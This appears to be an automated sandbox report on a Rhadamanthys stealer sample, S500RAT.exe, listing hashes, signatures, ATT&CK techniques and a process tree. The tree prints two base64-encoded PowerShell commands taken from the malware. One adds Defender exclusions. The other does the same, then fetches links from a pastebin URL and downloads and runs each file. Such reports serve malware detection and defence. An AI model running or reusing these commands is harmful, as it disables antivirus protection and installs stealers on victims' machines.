Analysis
-
max time kernel
29s -
max time network
13s -
platform
windows10-2004_x64 -
resource
win10v2004-20240730-en -
resource tags
-
submitted
02/08/2024, 12:44
General
-
Target
S500RAT.exe
-
Size
19.7MB
-
MD5
a30b20982e46cdf912f2921376499146
-
SHA1
d2733e2dbc3cfece6d6dc8d6656720b32bc7c288
-
SHA256
67221baac9a770a9d8ca6e69d0770fb33b3bc6a1e548c3a4349a750f1c2ee950
-
SHA512
20eff0091c733a0bb6a98b8fda8cc597b1d1293e3a1cad5e90459b3b22a241b8528490fba83535bd07cb50deff582086ccf25b2e296780135e1b62fcd6d10b4d
-
SSDEEP
393216:M+D6Dn2BamajCGVS7yCzIWHS0wsZ4/jQLoLZ0bmWWxPIPlGMfF64GsYIjgfIQwsG:7ARmGVStBxe/jYoLZKWxPIPlGMZG3qIG
Malware Config
Extracted
https://pastebin.com/raw/p2s7tDSd
Signatures
-
Detect rhadamanthys stealer shellcode 2 IoCs
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Blocklisted process makes network request 1 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 6 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Suspicious behavior: EnumeratesProcesses 41 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of FindShellTrayWindow 36 IoCs
-
Suspicious use of SendNotifyMessage 36 IoCs
-
Suspicious use of WriteProcessMemory 34 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAdwBiACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\w00ieq6n.exe"C:\Users\Admin\w00ieq6n.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\relog.exeC:\Windows\system32\relog.exe3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\relog.exeC:\Windows\system32\relog.exe4⤵
-
-
-
-
C:\Windows\S500RAT.exe"C:\Windows\S500RAT.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\blackCC.exe"C:\Users\Admin\AppData\Local\Temp\blackCC.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="5⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 7405⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 1364⤵
- Program crash
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1828 -ip 18281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4508 -ip 45081⤵
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
19KB
MD51ea08e23a5cd81fdc6f5ea8fffcd7087
SHA1e0a91ae2960097e22b40cb5f8c911a4645fd0dde
SHA256efabe171aac626073cf57108048a221a8838f6c3885df819d73853ede19b2298
SHA51268ed7275a00d8ce2a93a4c4429996cd3bbf312614e14a601920ac3a91b54c3e9b552437eabcb08782feb55c9f0e5765526cfc3218f24bba4dcb4e3c28af8ba66
-
Filesize
672KB
MD5dbf35eac1c87ed287c8f7cba33d133b5
SHA1d1dbfba561f8112e5099507a18cd9465b4fcb577
SHA25616094ff7a11c1960da481a9e106676fd94902e64c5625549493dca97bde72fcd
SHA512c4b2112773036d89ffb1faa44ce00e1ae5bb586c7bfc3219549f32adaf74e545687ebe4682db789cf4600dcbc38d0545dfec171d92d15244cb7234736ec5b532
-
Filesize
17.8MB
MD5e5f9792d0889af4fb6c295c5e0d74cee
SHA11aabebd0923a3e4e1772b48294c7b0fc86973e71
SHA256c5f99ca677d1b5aade06ab17adfa2a5c064c89e2f52875aefbca071ae2189f7f
SHA5124290a88de6fb0e6f851beff8577467760d1fa6afeda0d8a0afd50f6f7ad77d3960c0742260bdc87154c828a67f5807680dc8093386bbcd0ab97ccf8091b1b288
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
72KB
MD5462b459a2560b65a657cfecce53d682a
SHA1f0ce24faf42d2d1453c4f18fda0223b83486e5ae
SHA25600502647989c700d1cbf37685fcdf3a81d9302fb792edabecb5a211c5cdff0db
SHA5125d88eb5c91dd772d0c6f54e5d799639e1fd59d4dcf112674d065b76bb3ab048442cccc13f2f031f611b9632a223c961c7ad43f09a06b33d2f92adec7da9ff88b
-
Filesize
657KB
MD593eb0cf0043f1f507a1b94eea7b65fe4
SHA1148be925922c60190bde523cb60a50da9e544da1
SHA2566cbd8961b21b75bb176439538633191ed8364e755c8b2d049ca7281871430d30
SHA51294640f8dfd1ceeb8ec72be3bd40bbafb8b4b8dda584dffcd88c6c616cd65ffb9b0087ed093231db3940211a3b5c3fc8efed957c4e8a701b0a61dfe1c943ccf58
-
Filesize
19.0MB
MD573f84c857e0811622501856e9dd3ec72
SHA10ad76a2721a0f3d032fccaf6f3310005b6f968ea
SHA256acd11511324d5d76e3d7a9e786b62a6d25dc0240d57e9fd64228fa7e3409a4af
SHA512683fe78c846c3647838fb5c91392c8889dc1332795ccae07733cb8d9b69f9abc452ba2b84312a38e6cf08918ee72b320855c224499ae1f1f6bb3c8a98398ba20
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
19.0MB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
28KB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
460KB
-
Filesize
460KB
-
Filesize
304KB
-
Filesize
80KB
-
Filesize
120KB
-
Filesize
120KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
56KB
-
Filesize
68KB
-
Filesize
600KB
-
Filesize
40KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
200KB
-
Filesize
80KB
-
Filesize
652KB
-
Filesize
304KB
-
Filesize
216KB
-
Filesize
304KB
-
Filesize
3.3MB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
6.2MB
-
Filesize
17.8MB